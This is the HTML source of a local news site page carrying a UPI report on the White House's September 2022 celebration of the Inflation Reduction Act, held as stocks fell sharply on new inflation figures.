    <div class="menu-menu2-container"><ul id="menu-menu2-1" class="sf-menu"><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-first td-menu-item td-normal-menu menu-item-272719"><a href="https://gephardtdaily.com/category/top-stories/">TOP STORIES</a></li>
<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children td-menu-item td-normal-menu menu-item-587615"><a href="#">NEWS</a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-291329"><a href="https://gephardtdaily.com/category/local/">LOCAL</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent td-menu-item td-normal-menu menu-item-291328"><a href="https://gephardtdaily.com/category/national-international/">US/WORLD</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent td-menu-item td-normal-menu menu-item-378728"><a href="https://gephardtdaily.com/category/business/">BUSINESS</a></li>
	<li class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-587616"><a target="_blank" href="https://local.gephardtdaily.com/">GEPHARDT BUSINESS DIRECTORY</a></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-272718"><a href="https://gephardtdaily.com/category/entertainment/">ENTERTAINMENT</a></li>
<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-381620"><a href="https://gephardtdaily.com/st-george/">ST GEORGE</a></li>
<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-607130"><a href="https://gephardtdaily.com/coronavirus/">COVID-19</a></li>
<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-602051"><a href="https://gephardtdaily.com/bills-tv/">PODCASTS</a></li>
<li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-604288"><a href="https://gephardtdaily.com/bills-marketplace/">MARKETPLACE</a></li>
</ul></div></div>


    <div class="header-search-wrap">
        <div class="td-search-btns-wrap">
            <a id="td-header-search-button" href="#" role="button" class="dropdown-toggle " data-toggle="dropdown"><i class="td-icon-search"></i></a>
            <a id="td-header-search-button-mob" href="#" class="dropdown-toggle " data-toggle="dropdown"><i class="td-icon-search"></i></a>
        </div>

        <div class="td-drop-down-search" aria-labelledby="td-header-search-button">
            <form method="get" class="td-search-form" action="https://gephardtdaily.com/">
                <div role="search" class="td-head-form-search-wrap">
                    <input id="td-header-search" type="text" value="" name="s" autocomplete="off" /><input class="wpb_button wpb_btn-inverse btn" type="submit" id="td-header-search-top" value="Search" />
                </div>
            </form>
            <div id="td-aj-search"></div>
        </div>
    </div>
			</div>
		</div>
	</div>

    
</div>
            </div>

            
    <div class="td-main-content-wrap td-container-wrap">

        <div class="td-container td-post-template-default ">
            <div class="td-crumb-container"><div class="entry-crumbs"><span><a title="" class="entry-crumb" href="https://gephardtdaily.com/">Home</a></span> <i class="td-icon-right td-bread-sep"></i> <span><a title="View all posts in Business News" class="entry-crumb" href="https://gephardtdaily.com/category/business/">Business News</a></span> <i class="td-icon-right td-bread-sep td-bred-no-url-last"></i> <span class="td-bred-no-url-last">White House celebrates Inflation Reduction Act as stocks plunge</span></div></div>

            <div class="td-pb-row">
                                        <div class="td-pb-span8 td-main-content" role="main">
                            <div class="td-ss-main-content">
                                
    <article id="post-703053" class="post-703053 post type-post status-publish format-standard has-post-thumbnail category-business category-national-international tag-inflation-reduction-act tag-joe-biden tag-stocks" itemscope itemtype="https://schema.org/Article">
        <div class="td-post-header">

            <!-- category --><ul class="td-category"><li class="entry-category"><a  href="https://gephardtdaily.com/category/business/">Business News</a></li><li class="entry-category"><a  href="https://gephardtdaily.com/category/national-international/">US/World News</a></li></ul>
            <header class="td-post-title">
                <h1 class="entry-title">White House celebrates Inflation Reduction Act as stocks plunge</h1>
                

                <div class="td-module-meta-info">
                    <!-- author --><div class="td-post-author-name"><div class="td-author-by">By</div> <a href="https://gephardtdaily.com/author/upinone-com/">United Press International</a><div class="td-author-line"> - </div> </div>                    <!-- date --><span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2022-09-14T04:00:26-06:00" >September 14, 2022</time></span>                    <!-- comments -->                    <!-- views -->                </div>

            </header>

        </div>

        <div class="td-post-sharing-top"><div id="td_social_sharing_article_top" class="td-post-sharing td-ps-bg td-ps-notext td-post-sharing-style1 ">
		<style>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</style>

		<div class="td-post-sharing-visible"><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-facebook" href="https://www.facebook.com/sharer.php?u=https%3A%2F%2Fgephardtdaily.com%2Fnational-international%2Fwhite-house-celebrates-inflation-reduction-act-as-stocks-plunge%2F" title="Facebook" ><div class="td-social-but-icon"><i class="td-icon-facebook"></i></div><div class="td-social-but-text">Facebook</div></a><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-twitter" href="https://twitter.com/intent/tweet?text=White+House+celebrates+Inflation+Reduction+Act+as+stocks+plunge&url=https%3A%2F%2Fgephardtdaily.com%2Fnational-international%2Fwhite-house-celebrates-inflation-reduction-act-as-stocks-plunge%2F&via=GephardtDaily" title="Twitter" ><div class="td-social-but-icon"><i class="td-icon-twitter"></i></div><div class="td-social-but-text">Twitter</div></a><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-pinterest" href="https://pinterest.com/pin/create/button/?url=https://gephardtdaily.com/national-international/white-house-celebrates-inflation-reduction-act-as-stocks-plunge/&amp;media=https://gephardtdaily.com/wp-content/uploads/2022/09/White-House-celebrates-Inflation-Reduction-Act-as-stocks-plunge.jpg&description=White+House+celebrates+Inflation+Reduction+Act+as+stocks+plunge" title="Pinterest" ><div class="td-social-but-icon"><i class="td-icon-pinterest"></i></div><div class="td-social-but-text">Pinterest</div></a><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-whatsapp" href="https://api.whatsapp.com/send?text=White+House+celebrates+Inflation+Reduction+Act+as+stocks+plunge %0A%0A https://gephardtdaily.com/national-international/white-house-celebrates-inflation-reduction-act-as-stocks-plunge/" title="WhatsApp" ><div class="td-social-but-icon"><i class="td-icon-whatsapp"></i></div><div class="td-social-but-text">WhatsApp</div></a></div><div class="td-social-sharing-hidden"><ul class="td-pulldown-filter-list"></ul><a class="td-social-sharing-button td-social-handler td-social-expand-tabs" href="#" data-block-uid="td_social_sharing_article_top" title="More">
                                    <div class="td-social-but-icon"><i class="td-icon-plus td-social-expand-tabs-icon"></i></div>
                                </a></div></div></div>
        <div class="td-post-content tagdiv-type">
            <!-- image --><div class="td-post-featured-image"><figure><a href="https://gephardtdaily.com/wp-content/uploads/2022/09/White-House-celebrates-Inflation-Reduction-Act-as-stocks-plunge.jpg" data-caption="President Joe Biden hosts an event celebrating the passage of the Inflation Reduction Act Tuesday on the South Lawn of the White House in Washington, D.C. Photo by Ken Cedeno/UPI"><img width="696" height="381" class="entry-thumb td-modal-image" src="https://gephardtdaily.com/wp-content/uploads/2022/09/White-House-celebrates-Inflation-Reduction-Act-as-stocks-plunge-696x381.jpg" srcset="https://gephardtdaily.com/wp-content/uploads/2022/09/White-House-celebrates-Inflation-Reduction-Act-as-stocks-plunge-696x381.jpg 696w, https://gephardtdaily.com/wp-content/uploads/2022/09/White-House-celebrates-Inflation-Reduction-Act-as-stocks-plunge-300x164.jpg 300w, https://gephardtdaily.com/wp-content/uploads/2022/09/White-House-celebrates-Inflation-Reduction-Act-as-stocks-plunge-1024x561.jpg 1024w, https://gephardtdaily.com/wp-content/uploads/2022/09/White-House-celebrates-Inflation-Reduction-Act-as-stocks-plunge-768x421.jpg 768w, https://gephardtdaily.com/wp-content/uploads/2022/09/White-House-celebrates-Inflation-Reduction-Act-as-stocks-plunge-100x55.jpg 100w, https://gephardtdaily.com/wp-content/uploads/2022/09/White-House-celebrates-Inflation-Reduction-Act-as-stocks-plunge-1068x585.jpg 1068w, https://gephardtdaily.com/wp-content/uploads/2022/09/White-House-celebrates-Inflation-Reduction-Act-as-stocks-plunge-767x420.jpg 767w, https://gephardtdaily.com/wp-content/uploads/2022/09/White-House-celebrates-Inflation-Reduction-Act-as-stocks-plunge-560x307.jpg 560w, https://gephardtdaily.com/wp-content/uploads/2022/09/White-House-celebrates-Inflation-Reduction-Act-as-stocks-plunge.jpg 1099w" sizes="(max-width: 696px) 100vw, 696px" alt="" title="White-House-celebrates-Inflation-Reduction-Act-as-stocks-plunge"/></a><figcaption class="wp-caption-text">President Joe Biden hosts an event celebrating the passage of the Inflation Reduction Act Tuesday on the South Lawn of the White House in Washington, D.C. Photo by Ken Cedeno/UPI</figcaption></figure></div>
            <!-- content --><div class="td-a-rec td-a-rec-id-content_top  tdi_2 td_block_template_1">
<style>
/* custom css */
.tdi_2.td-a-rec{
					text-align: center;
				}.tdi_2 .td-element-style{
					z-index: -1;
				}.tdi_2.td-a-rec-img{
				    text-align: left;
				}.tdi_2.td-a-rec-img img{
                    margin: 0 auto 0 0;
                }@media (max-width: 767px) {
				    .tdi_2.td-a-rec-img {
				        text-align: center;
				    }
                }
</style><div class="td-all-devices">
<!-- AdSpeed.com Tag 8.0.2 for [Zone] Blog_Leader [Any Dimension] -->
<script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script type="text/javascript" src="https://g.adspeed.net/ad.php?do=js&zid=72935&oid=18069&wd=-1&ht=-1&target=_blank"></script>
<!-- AdSpeed.com End -->
</div></div><p><span class="story_dl">Sept. 14 (UPI) &#8212;</span> President <a href="https://gephardtdaily.com/tag/joe-biden/">Joe Biden</a> and fellow Democrats hosted a White House celebration Tuesday touting the Inflation Reduction Act as stocks plunged nearly 1,300 points on news of rising consumer prices.</p>
<p>Speaking to hundreds of people on the White House South Lawn against the background of live music from <a class="tpstyle" title="James Taylor" href="https://www.upi.com/topic/James_Taylor/" target="_blank" rel="noopener">James Taylor</a>, Biden celebrated the $750 billion tax, climate and health care legislation saying &#8220;<a href="https://www.washingtonpost.com/politics/2022/09/13/biden-inflation-reduction-act/" target="_blank" rel="noopener">this is your victory</a>.&#8221;</p><div class="td-a-rec td-a-rec-id-content_inlineleft  tdi_1 td_block_template_1">
<style>
/* custom css */
.tdi_1.td-a-rec{
					text-align: center;
				}.tdi_1 .td-element-style{
					z-index: -1;
				}.tdi_1.td-a-rec-img{
				    text-align: left;
				}.tdi_1.td-a-rec-img img{
                    margin: 0 auto 0 0;
                }@media (max-width: 767px) {
				    .tdi_1.td-a-rec-img {
				        text-align: center;
				    }
                }
</style><!-- AdSpeed.com Tag 8.0.2 for [Zone] All Article Rec [Any Dimension] -->
 <script type="text/javascript" src="https://g.adspeed.net/ad.php?do=js&zid=77448&oid=18069&wd=-1&ht=-1&refresh=30&target=_blank&cb=%%CACHEBUSTER%%&r=%%CLICK_URL_ESC%%"></script> 
<!-- AdSpeed.com End --></div>
<p>&#8220;Today offers proof that the soul of America is vibrant, the future of America is bright and the promise of America is real,&#8221; Biden said. &#8220;It is real, it is real.&#8221;</p>
<p>The Inflation Reduction Act, which Biden signed into law last month, pours billions of dollars into climate projects. It also limits out-of-pocket drug costs for seniors on Medicare and sets a minimum 15% corporate tax rate for large companies.</p>
<p>&#8220;The days of companies paying zero in taxes is over, I promise you,&#8221; Biden said.</p>
<p>The celebration fell on the same day the Labor Department released its consumer price index report for August, showing <a href="https://www.upi.com/Top_News/US/2022/09/13/inflation-consumer-price-index-economy/1081663081074/" target="_blank" rel="noopener">higher-than-expected inflation</a> numbers. Consumer prices rose 0.1% after remaining flat in July, sending the Dow Jones Industrial Average <a href="https://www.upi.com/Top_News/US/2022/09/13/stocks-plunge-1200-points-inflation/1601663103235/" target="_blank" rel="noopener">tumbling 1,276 points</a>, while the S&amp;P 500 suffered its worst day since June 2020.</p>
<p>As consumer prices hover near a 40-year high, inflation remains a top issue for voters heading into the November midterm elections.</p>
<p>&#8220;We&#8217;re making progress,&#8221; Biden told the crowd as he touted lower gas prices. &#8220;We&#8217;re getting other prices down as well.&#8221;</p>
<p>Senate Democratic leader <a class="tpstyle" title="Chuck Schumer" href="https://www.upi.com/topic/Chuck_Schumer/" target="_blank" rel="noopener">Chuck Schumer</a>, House Speaker <a class="tpstyle" title="Nancy Pelosi" href="https://www.upi.com/topic/Nancy_Pelosi/" target="_blank" rel="noopener">Nancy Pelosi</a> and Vice President <a class="tpstyle" title="Kamala Harris" href="https://www.upi.com/topic/Kamala_Harris/" target="_blank" rel="noopener">Kamala Harris</a> also spoke at the White House event.</p>
<p>&#8220;Inflation Reduction Act, <a href="https://thehill.com/homenews/administration/3641375-democrats-celebrate-inflation-reduction-bill-as-stocks-tumble-on-latest-data/" target="_blank" rel="noopener">so beautifully named</a> for all it does,&#8221; Pelosi said.</p>
<p>&#8220;It&#8217;s been a long process, but the House Democratic caucus stayed the course, worked incredibly hard and made this moment possible,&#8221; Schumer said. &#8220;And finally, I want to thank President Biden. We would never, never have gotten the Inflation Reduction Act done without his steady hand.&#8221;</p>
<p>Republicans have argued the new law will not cure high inflation and could make it worse as Senate Minority Leader <a class="tpstyle" title="Mitch McConnell" href="https://www.upi.com/topic/Mitch_McConnell/" target="_blank" rel="noopener">Mitch McConnell</a> called the White House celebration &#8220;out of touch.&#8221;</p>
        </div>

        <footer>
            <!-- post pagination -->            <!-- review -->
            <div class="td-post-source-tags">
                <!-- source via -->                <!-- tags --><ul class="td-tags td-post-small-box clearfix"><li><span>TAGS</span></li><li><a href="https://gephardtdaily.com/tag/inflation-reduction-act/">Inflation Reduction Act</a></li><li><a href="https://gephardtdaily.com/tag/joe-biden/">Joe Biden</a></li><li><a href="https://gephardtdaily.com/tag/stocks/">Stocks</a></li></ul>            </div>

            <div class="td-post-sharing-bottom"><div class="td-post-sharing-classic"><iframe frameBorder="0" src="https://www.facebook.com/plugins/like.php?href=https://gephardtdaily.com/national-international/white-house-celebrates-inflation-reduction-act-as-stocks-plunge/&amp;layout=button_count&amp;show_faces=false&amp;width=105&amp;action=like&amp;colorscheme=light&amp;height=21" style="border:none; overflow:hidden; width:auto; height:21px; background-color:transparent;"></iframe></div><div id="td_social_sharing_article_bottom" class="td-post-sharing td-ps-bg td-ps-notext td-post-sharing-style1 "><div class="td-post-sharing-visible"><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-facebook" href="https://www.facebook.com/sharer.php?u=https%3A%2F%2Fgephardtdaily.com%2Fnational-international%2Fwhite-house-celebrates-inflation-reduction-act-as-stocks-plunge%2F" title="Facebook" ><div class="td-social-but-icon"><i class="td-icon-facebook"></i></div><div class="td-social-but-text">Facebook</div></a><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-twitter" href="https://twitter.com/intent/tweet?text=White+House+celebrates+Inflation+Reduction+Act+as+stocks+plunge&url=https%3A%2F%2Fgephardtdaily.com%2Fnational-international%2Fwhite-house-celebrates-inflation-reduction-act-as-stocks-plunge%2F&via=GephardtDaily" title="Twitter" ><div class="td-social-but-icon"><i class="td-icon-twitter"></i></div><div class="td-social-but-text">Twitter</div></a><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-pinterest" href="https://pinterest.com/pin/create/button/?url=https://gephardtdaily.com/national-international/white-house-celebrates-inflation-reduction-act-as-stocks-plunge/&amp;media=https://gephardtdaily.com/wp-content/uploads/2022/09/White-House-celebrates-Inflation-Reduction-Act-as-stocks-plunge.jpg&description=White+House+celebrates+Inflation+Reduction+Act+as+stocks+plunge" title="Pinterest" ><div class="td-social-but-icon"><i class="td-icon-pinterest"></i></div><div class="td-social-but-text">Pinterest</div></a><a class="td-social-sharing-button td-social-sharing-button-js td-social-network td-social-whatsapp" href="https://api.whatsapp.com/send?text=White+House+celebrates+Inflation+Reduction+Act+as+stocks+plunge %0A%0A https://gephardtdaily.com/national-international/white-house-celebrates-inflation-reduction-act-as-stocks-plunge/" title="WhatsApp" ><div class="td-social-but-icon"><i class="td-icon-whatsapp"></i></div><div class="td-social-but-text">WhatsApp</div></a></div><div class="td-social-sharing-hidden"><ul class="td-pulldown-filter-list"></ul><a class="td-social-sharing-button td-social-handler td-social-expand-tabs" href="#" data-block-uid="td_social_sharing_article_bottom" title="More">
                                    <div class="td-social-but-icon"><i class="td-icon-plus td-social-expand-tabs-icon"></i></div>
                                </a></div></div></div>            <!-- next prev --><div class="td-block-row td-post-next-prev"><div class="td-block-span6 td-post-prev-post"><div class="td-post-next-prev-content"><span>Previous article</span><a href="https://gephardtdaily.com/local/millard-county-jail-inmate-dies-after-being-found-unresponsive-in-cell/">Millard County Jail inmate dies after being found unresponsive in cell</a></div></div><div class="td-next-prev-separator"></div></div>            <!-- author box --><div class="author-box-wrap"><a href="https://gephardtdaily.com/author/upinone-com/" aria-label="author-photo"></a><div class="desc"><div class="td-author-name vcard author"><span class="fn"><a href="https://gephardtdaily.com/author/upinone-com/">United Press International</a></span></div><div class="td-author-url"><a href="https://www.upi.com/">https://www.upi.com/</a></div><div class="td-author-description">UPI delivers the latest headlines from around the world: Top News, Entertainment, Health, Business, Science and Sports News - United Press International.</div><div class="td-author-social"></div><div class="clearfix"></div></div></div>            <!-- meta --><span class="td-page-meta" itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="United Press International"><meta itemprop="url" content="https://gephardtdaily.com/author/upinone-com/"></span><meta itemprop="datePublished" content="2022-09-14T04:00:26-06:00"><meta itemprop="dateModified" content="2022-09-13T22:06:17-06:00"><meta itemscope itemprop="mainEntityOfPage" itemType="https://schema.org/WebPage" itemid="https://gephardtdaily.com/national-international/white-house-celebrates-inflation-reduction-act-as-stocks-plunge/"/><span class="td-page-meta" itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><span class="td-page-meta" itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="https://gephardtdaily.com/national-international/white-house-celebrates-inflation-reduction-act-as-stocks-plunge/"></span><meta itemprop="name" content="Gephardt Daily"></span><meta itemprop="headline " content="White House celebrates Inflation Reduction Act as stocks plunge"><span class="td-page-meta" itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="https://gephardtdaily.com/wp-content/uploads/2022/09/White-House-celebrates-Inflation-Reduction-Act-as-stocks-plunge.jpg"><meta itemprop="width" content="1099"><meta itemprop="height" content="602"></span>        </footer>

    </article> <!-- /.post -->

    <div class="td_block_wrap td_block_related_posts tdi_3 td_with_ajax_pagination td-pb-border-top td_block_template_1"  data-td-block-uid="tdi_3" ><script>var block_tdi_3 = new tdBlock();
block_tdi_3.id = "tdi_3";
block_tdi_3.atts = '{"limit":3,"ajax_pagination":"next_prev","live_filter":"cur_post_same_tags","td_ajax_filter_type":"td_custom_related","class":"tdi_3","td_column_number":3,"block_type":"td_block_related_posts","live_filter_cur_post_id":703053,"live_filter_cur_post_author":"22","block_template_id":"","header_color":"","ajax_pagination_infinite_stop":"","offset":"","td_ajax_preloading":"","td_filter_default_txt":"","td_ajax_filter_ids":"","el_class":"","color_preset":"","border_top":"","css":"","tdc_css":"","tdc_css_class":"tdi_3","tdc_css_class_style":"tdi_3_rand_style"}';
block_tdi_3.td_column_number = "3";
block_tdi_3.block_type = "td_block_related_posts";
block_tdi_3.post_count = "3";
block_tdi_3.found_posts = "279";
block_tdi_3.header_color = "";
block_tdi_3.ajax_pagination_infinite_stop = "";
block_tdi_3.max_num_pages = "93";
tdBlocksArray.push(block_tdi_3);
</script><h4 class="td-related-title td-block-title"><a id="tdi_4" class="td-related-left td-cur-simple-item" data-td_filter_value="" data-td_block_id="tdi_3" href="#">RELATED ARTICLES</a><a id="tdi_5" class="td-related-right" data-td_filter_value="td_related_more_from_author" data-td_block_id="tdi_3" href="#">MORE FROM AUTHOR</a></h4><div id=tdi_3 class="td_block_inner">

	<div class="td-related-row">

	<div class="td-related-span4">

        <div class="td_module_related_posts td-animation-stack td_mod_related_posts">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="https://gephardtdaily.com/health/biden-details-moonshot-plan-to-end-cancer-on-60th-anniversary-of-jfk-speech/" rel=" bookmark" class="td-image-wrap " title="Biden details &#8216;moonshot&#8217; plan to end cancer on 60th anniversary of JFK speech" ><img width="218" height="150" class="entry-thumb" src="https://gephardtdaily.com/wp-content/uploads/2022/09/Biden-details-moonshot-plan-to-end-cancer-on-60th-anniversary-of-JFK-speech-218x150.jpg"  srcset="https://gephardtdaily.com/wp-content/uploads/2022/09/Biden-details-moonshot-plan-to-end-cancer-on-60th-anniversary-of-JFK-speech-218x150.jpg 218w, https://gephardtdaily.com/wp-content/uploads/2022/09/Biden-details-moonshot-plan-to-end-cancer-on-60th-anniversary-of-JFK-speech-100x70.jpg 100w" sizes="(max-width: 218px) 100vw, 218px"  alt="" title="Biden details &#8216;moonshot&#8217; plan to end cancer on 60th anniversary of JFK speech" /></a></div>                            </div>
            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="https://gephardtdaily.com/health/biden-details-moonshot-plan-to-end-cancer-on-60th-anniversary-of-jfk-speech/" rel="bookmark" title="Biden details &#8216;moonshot&#8217; plan to end cancer on 60th anniversary of JFK speech">Biden details &#8216;moonshot&#8217; plan to end cancer on 60th anniversary of JFK speech</a></h3>            </div>
        </div>
        
	</div> <!-- ./td-related-span4 -->

	<div class="td-related-span4">

        <div class="td_module_related_posts td-animation-stack td_mod_related_posts">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="https://gephardtdaily.com/national-international/biden-keeps-pressure-on-maga-republicans-in-labor-day-remarks/" rel=" bookmark" class="td-image-wrap " title="Biden keeps pressure on &#8216;MAGA Republicans&#8217; in Labor Day remarks" ><img width="218" height="150" class="entry-thumb" src="https://gephardtdaily.com/wp-content/uploads/2022/09/Biden-keeps-pressure-on-MAGA-Republicans-in-Labor-Day-remarks-218x150.jpg"  srcset="https://gephardtdaily.com/wp-content/uploads/2022/09/Biden-keeps-pressure-on-MAGA-Republicans-in-Labor-Day-remarks-218x150.jpg 218w, https://gephardtdaily.com/wp-content/uploads/2022/09/Biden-keeps-pressure-on-MAGA-Republicans-in-Labor-Day-remarks-100x70.jpg 100w" sizes="(max-width: 218px) 100vw, 218px"  alt="" title="Biden keeps pressure on &#8216;MAGA Republicans&#8217; in Labor Day remarks" /></a></div>                            </div>
            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="https://gephardtdaily.com/national-international/biden-keeps-pressure-on-maga-republicans-in-labor-day-remarks/" rel="bookmark" title="Biden keeps pressure on &#8216;MAGA Republicans&#8217; in Labor Day remarks">Biden keeps pressure on &#8216;MAGA Republicans&#8217; in Labor Day remarks</a></h3>            </div>
        </div>
        
	</div> <!-- ./td-related-span4 -->

	<div class="td-related-span4">

        <div class="td_module_related_posts td-animation-stack td_mod_related_posts">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="https://gephardtdaily.com/national-international/proud-boy-who-encountered-chuck-schumer-in-jan-6-riots-sentenced-to-55-months-in-prison/" rel=" bookmark" class="td-image-wrap " title="Proud Boy who encountered Chuck Schumer in Jan. 6 riots sentenced to 55 months in prison" ><img width="218" height="150" class="entry-thumb" src="https://gephardtdaily.com/wp-content/uploads/2022/08/Proud-Boy-who-encountered-Chuck-Schumer-in-Jan-6-riots-sentenced-to-55-months-in-prison-218x150.jpg"  srcset="https://gephardtdaily.com/wp-content/uploads/2022/08/Proud-Boy-who-encountered-Chuck-Schumer-in-Jan-6-riots-sentenced-to-55-months-in-prison-218x150.jpg 218w, https://gephardtdaily.com/wp-content/uploads/2022/08/Proud-Boy-who-encountered-Chuck-Schumer-in-Jan-6-riots-sentenced-to-55-months-in-prison-100x70.jpg 100w" sizes="(max-width: 218px) 100vw, 218px"  alt="" title="Proud Boy who encountered Chuck Schumer in Jan. 6 riots sentenced to 55 months in prison" /></a></div>                            </div>
            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="https://gephardtdaily.com/national-international/proud-boy-who-encountered-chuck-schumer-in-jan-6-riots-sentenced-to-55-months-in-prison/" rel="bookmark" title="Proud Boy who encountered Chuck Schumer in Jan. 6 riots sentenced to 55 months in prison">Proud Boy who encountered Chuck Schumer in Jan. 6 riots sentenced to 55 months in prison</a></h3>            </div>
        </div>
        
	</div> <!-- ./td-related-span4 --></div><!--./row-fluid--></div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" aria-label="prev-page" id="prev-page-tdi_3" data-td_block_id="tdi_3"><i class="td-next-prev-icon td-icon-font td-icon-menu-left"></i></a><a href="#"  class="td-ajax-next-page" aria-label="next-page" id="next-page-tdi_3" data-td_block_id="tdi_3"><i class="td-next-prev-icon td-icon-font td-icon-menu-right"></i></a></div></div> <!-- ./block -->
        <div class="comments" id="comments">
        	<div id="respond" class="comment-respond">
		<h3 id="reply-title" class="comment-reply-title">LEAVE A REPLY <small><a rel="nofollow" id="cancel-comment-reply-link" href="/national-international/white-house-celebrates-inflation-reduction-act-as-stocks-plunge/#respond" style="display:none;">Cancel reply</a></small></h3><form action="https://gephardtdaily.com/wp-comments-post.php" method="post" id="commentform" class="comment-form" novalidate><div class="clearfix"></div>
            <div class="comment-form-input-wrap td-form-comment">
                <textarea placeholder="Comment:" id="comment" name="comment" cols="45" rows="8" aria-required="true"></textarea>
                <div class="td-warning-comment">Please enter your comment!</div>
            </div><div class="comment-form-input-wrap td-form-author">
			            <input class="" id="author" name="author" placeholder="Name:*" type="text" value="" size="30"  aria-required='true' />
			            <div class="td-warning-author">Please enter your name here</div>
			         </div>
<div class="comment-form-input-wrap td-form-email">
			            <input class="" id="email" name="email" placeholder="Email:*" type="text" value="" size="30"  aria-required='true' />
			            <div class="td-warning-email-error">You have entered an incorrect email address!</div>
			            <div class="td-warning-email">Please enter your email address here</div>
			         </div>
<div class="comment-form-input-wrap td-form-url">
			            <input class="" id="url" name="url" placeholder="Website:" type="text" value="" size="30" />
                     </div>
<p class="comment-form-cookies-consent"><input id="wp-comment-cookies-consent" name="wp-comment-cookies-consent" type="checkbox" value="yes" /><label for="wp-comment-cookies-consent">Save my name, email, and website in this browser for the next time I comment.</label></p>
<p class="form-submit"><input name="submit" type="submit" id="submit" class="submit" value="Post Comment" /> <input type='hidden' name='comment_post_ID' value='703053' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p><p style="display: none;"><input type="hidden" id="akismet_comment_nonce" name="akismet_comment_nonce" value="95d64e093a" /></p><p style="display: none !important;"><label>&#916;<textarea name="ak_hp_textarea" cols="45" rows="8" maxlength="100"></textarea></label><input type="hidden" id="ak_js_1" name="ak_js" value="199"/><script>document.getElementById( "ak_js_1" ).setAttribute( "value", ( new Date() ).getTime() );</script></p></form>	</div><!-- #respond -->
	    </div> <!-- /.content -->
                                </div>
                        </div>
                        <div class="td-pb-span4 td-main-sidebar" role="complementary">
                            <div class="td-ss-main-sidebar">
                                <aside id="adspeed-ad-server-30" class="td_block_template_1 widget adspeed-ad-server-30 AdSpeed Ad Server"><div class="AdSpeedWP">
		<!-- AdSpeed.com WP Ad Tag 8.0.2 for [Zone] #78660 [Any Dimension] -->
		<script type="text/javascript" src="//g.adspeed.net/ad.php?do=js&zid=78660&wd=-1&ht=-1&target=_blank&cb=1663149699"></script>
		<!-- AdSpeed.com End --></div></aside><aside id="adspeed-ad-server-31" class="td_block_template_1 widget adspeed-ad-server-31 AdSpeed Ad Server"><div class="AdSpeedWP">
		<!-- AdSpeed.com WP Ad Tag 8.0.2 for [Zone] #78661 [Any Dimension] -->
		<script type="text/javascript" src="//g.adspeed.net/ad.php?do=js&zid=78661&wd=-1&ht=-1&target=_blank&cb=1663149699"></script>
		<!-- AdSpeed.com End --></div></aside>
		<aside id="recent-posts-8" class="td_block_template_1 widget recent-posts-8 widget_recent_entries">
		<h4 class="block-title"><span>Recent Posts</span></h4>
		<ul>
											<li>
					<a href="https://gephardtdaily.com/national-international/white-house-celebrates-inflation-reduction-act-as-stocks-plunge/" aria-current="page">White House celebrates Inflation Reduction Act as stocks plunge</a>
									</li>
											<li>
					<a href="https://gephardtdaily.com/local/millard-county-jail-inmate-dies-after-being-found-unresponsive-in-cell/">Millard County Jail inmate dies after being found unresponsive in cell</a>
									</li>
											<li>
					<a href="https://gephardtdaily.com/local/west-coast-conference-issues-statement-of-support-for-byus-investigation-into-racist-remarks/">West Coast Conference issues statement of support for BYU&#8217;s investigation into racist remarks</a>
									</li>
											<li>
					<a href="https://gephardtdaily.com/national-international/dow-plunges-1276-points-in-worst-day-since-june-2020/">Dow plunges 1,276 points in worst day since June 2020</a>
									</li>
											<li>
					<a href="https://gephardtdaily.com/local/police-arrest-man-who-allegedly-threatened-st-george-school-resource-officer/">Police arrest man who allegedly threatened St. George school resource officer</a>
									</li>
					</ul>

		</aside><aside id="adspeed-ad-server-32" class="td_block_template_1 widget adspeed-ad-server-32 AdSpeed Ad Server"><div class="AdSpeedWP">
		<!-- AdSpeed.com WP Ad Tag 8.0.2 for [Zone] #77442 [Any Dimension] -->
		<script type="text/javascript" src="//g.adspeed.net/ad.php?do=js&zid=77442&wd=-1&ht=-1&target=_blank&cb=1663149699"></script>
		<!-- AdSpeed.com End --></div></aside>                            </div>
                        </div>
                                    </div> <!-- /.td-pb-row -->
        </div> <!-- /.td-container -->
    </div> <!-- /.td-main-content-wrap -->

<!-- Instagram -->

	
	
            <div class="tdc-footer-wrap ">

                <!-- Footer -->
				<div class="td-footer-wrapper td-footer-container td-container-wrap ">
    <div class="td-container">

	    <div class="td-pb-row">
		    <div class="td-pb-span12">
                		    </div>
	    </div>

        <div class="td-pb-row">

            <div class="td-pb-span4">
                
		<aside class="td_block_template_1 widget widget_recent_entries">
		<h4 class="block-title"><span>MOST RECENT NEWS</span></h4>
